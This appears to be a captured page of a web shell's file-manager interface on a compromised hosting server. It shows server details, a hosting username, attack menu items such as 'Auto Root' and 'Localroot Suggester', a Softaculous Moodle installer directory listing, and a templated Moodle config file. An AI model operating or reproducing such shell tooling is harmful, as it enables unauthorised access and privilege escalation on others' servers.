Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
moodle29 /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-08-15 20:00
languages
[ DIR ]
drwxr-xr-x
2025-08-15 20:00
php53
[ DIR ]
drwxr-xr-x
2025-08-15 20:00
php56
[ DIR ]
drwxr-xr-x
2025-08-15 20:00
php71
[ DIR ]
drwxr-xr-x
2025-08-15 20:00
php81
[ DIR ]
drwxr-xr-x
2025-08-15 20:00
php82
[ DIR ]
drwxr-xr-x
2025-08-15 20:00
NOTES.txt
1.7
KB
-rwxr-xr-x
2024-10-30 08:35
add_admin.php
733
B
-rwxr-xr-x
2022-06-30 08:50
check_utf8.php
5.88
KB
-rwxr-xr-x
2022-03-16 06:40
clone.php
5.5
KB
-rwxr-xr-x
2025-07-14 08:37
config.php
745
B
-rwxr-xr-x
2021-12-23 06:54
edit.php
5.69
KB
-rwxr-xr-x
2025-07-14 08:37
edit.xml
433
B
-rwxr-xr-x
2021-12-23 06:54
fileindex.php
896
B
-rwxr-xr-x
2024-10-30 08:35
import.php
7.5
KB
-rwxr-xr-x
2025-07-14 08:37
info.xml
3.37
KB
-rwxr-xr-x
2025-07-14 08:24
install.js
924
B
-rwxr-xr-x
2021-12-23 06:54
install.php
19.75
KB
-rwxr-xr-x
2025-07-14 08:37
install.xml
2.53
KB
-rwxr-xr-x
2023-06-29 06:20
md5
5.49
KB
-rwxr-xr-x
2025-07-14 08:37
privatekey.php
786
B
-rwxr-xr-x
2021-12-23 06:54
update_pass.php
3.17
KB
-rwxr-xr-x
2021-12-23 06:54
upgrade.php
7.75
KB
-rwxr-xr-x
2025-07-14 08:37
upgrade.xml
307
B
-rwxr-xr-x
2021-12-23 06:54
Save
Rename
<?php // Moodle configuration file unset($CFG); global $CFG; $CFG = new stdClass(); $CFG->dbtype = '[[dbtype]]'; $CFG->dblibrary = 'native'; $CFG->dbhost = '[[softdbhost]]'; $CFG->dbname = '[[softdb]]'; $CFG->dbuser = '[[softdbuser]]'; $CFG->dbpass = '[[softdbpass]]'; $CFG->prefix = '[[dbprefix]]'; $CFG->dboptions = array ( 'dbpersist' => 0, 'dbport' => '', 'dbsocket' => '', 'dbcollation' => '[[collate]]', ); $CFG->wwwroot = '[[punycode_softurl]]'; $CFG->dataroot = '[[softdatadir]]'; $CFG->admin = 'admin'; $CFG->directorypermissions = 0777; require_once(__DIR__ . '/lib/setup.php'); // There is no php closing tag in this file, // it is intentional because it prevents trailing whitespace problems!